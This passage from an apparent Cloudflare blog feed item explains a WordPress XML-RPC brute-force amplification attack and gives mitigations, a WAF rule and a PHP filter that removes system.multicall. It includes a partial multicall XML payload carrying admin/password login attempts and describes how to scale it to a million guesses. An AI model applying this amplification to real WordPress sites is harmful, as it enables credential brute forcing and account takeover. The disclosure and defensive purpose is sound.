	&lt;value&gt;&lt;string&gt;password&lt;/string&gt;&lt;/value&gt;
	&lt;/data&gt;&lt;/array&gt;&lt;/value&gt;
	&lt;/data&gt;&lt;/array&gt;&lt;/value&gt;
  &lt;/member&gt;
  &lt;/struct&gt;&lt;/value&gt;
  &lt;value&gt;&lt;struct&gt;
  &lt;member&gt;
	&lt;name&gt;methodName&lt;/name&gt;
	&lt;value&gt;&lt;string&gt;wp.getUsersBlogs&lt;/string&gt;&lt;/value&gt;
  &lt;/member&gt;
  &lt;member&gt;
	&lt;name&gt;params&lt;/name&gt;
	&lt;value&gt;&lt;array&gt;&lt;data&gt;
	&lt;value&gt;&lt;array&gt;&lt;data&gt;
	  &lt;value&gt;&lt;string&gt;admin&lt;/string&gt;&lt;/value&gt;
	  &lt;value&gt;&lt;string&gt;password&lt;/string&gt;&lt;/value&gt;
	  &lt;/data&gt;&lt;/array&gt;&lt;/value&gt;
	&lt;/data&gt;&lt;/array&gt;&lt;/value&gt;
  &lt;/member&gt;
  &lt;/struct&gt;&lt;/value&gt;
  &lt;/data&gt;&lt;/array&gt;&lt;/value&gt;
  &lt;/param&gt;
&lt;/params&gt;
&lt;/methodCall&gt;</code></pre>
            <p>As you can see, this can lead to very obvious abuse.</p>
    <div>
      <h3>Exploitation</h3>
    </div>
    <p>During testing, I was able to call the method <code>wp.getUsersBlogs</code> 1,000 times in a single HTTP request (limited only by PHP memory issues). If a user creates a simple shell loop that executes one thousand times and runs a PHP script that crafts an HTTP request with one thousand method calls all requiring authentication, then that user would be able to try one million unique logins in a very short period of time.</p><p>This makes brute forcing the login very fast and can run down a pretty large wordlist in a short period of time. Also note that the <code>wp.getUsersBlogs</code> method isn’t the only RPC call requiring authentication. It’s possible to use any RPC method which requires authentication to attempt logins and brute force the WordPress credentials.</p>
    <div>
      <h3>CloudFlare Customers Are Protected</h3>
    </div>
    <p>When using CloudFlare with a Pro level plan or higher, you have the ability to turn on the Web Application Firewall (WAF) and take advantage of the new WordPress ruleset I created to mitigate this attack—all without any major interaction or supervision on your end.</p><p>Our WAF works by checking HTTP requests for patterns that match known attacks and malicious activities. If a request does appear to be malicious, we drop it at the edge so it never even reaches the customer’s origin server.</p><p>To enable the rule, navigate to your CloudFlare Firewall dashboard, and reference the rule named "Blocks amplified brute force attempts to xmlrpc.php" with the rule ID WP0018.</p>
            <figure>
            
            <img src="https://cf-assets.www.cloudflare.com/zkvhlag99gkb/4UjJTAaaGerRJ928DM0NGv/cc569d79f7675aafdf10d83ef73ea4cc/enabling-xmlrpc-waf-rule.png" />
            
            </figure><p>That’s all there is to it. Now you are protected from the new WordPress XML-RPC brute force amplification attack.</p>
    <div>
      <h3>The Manual Solution</h3>
    </div>
    <p>Another way to mitigate this attack is by disabling the ability to call the <code>system.multicall</code> method in your WordPress installation by editing your <code>functions.php</code> file. Adding the function <code>mmx_remove_xmlrpc_methods()</code> will alleviate the problem, like so:</p>
            <pre><code>// Drop system.multicall from the list of XML-RPC methods WordPress exposes
function mmx_remove_xmlrpc_methods( $methods ) {
	unset( $methods['system.multicall'] );
	return $methods;
}
add_filter( 'xmlrpc_methods', 'mmx_remove_xmlrpc_methods' );</code></pre>
            
    <div>
      <h3>Final Thoughts</h3>
    </div>
    <p>XML-RPC can be a useful tool for making changes to WordPress and other web applications; however, improper implementation of certain features can result in unintended consequences. Default-on methods like <code>system.multicall</code> and <code>pingback.ping</code> (we have a <a href="/wordpress-pingback-attacks-and-our-waf/">WAF rule for that one</a>, too) are just a few examples of possible exploits.</p><p>Properly configuring the CloudFlare Web Application Firewall for your Internet-facing properties will protect you from such attacks with no changes to your server configuration.</p> ]]></content:encoded>
            <category><![CDATA[WordPress]]></category>
            <category><![CDATA[php]]></category>
            <category><![CDATA[Attacks]]></category>
            <category><![CDATA[Reliability]]></category>
            <guid isPermaLink="false">6gLyPOxWVFfvjEC44cNrMg</guid>
            <dc:creator>Pasha Kravtsov</dc:creator>
        </item>
    </channel>
</rss>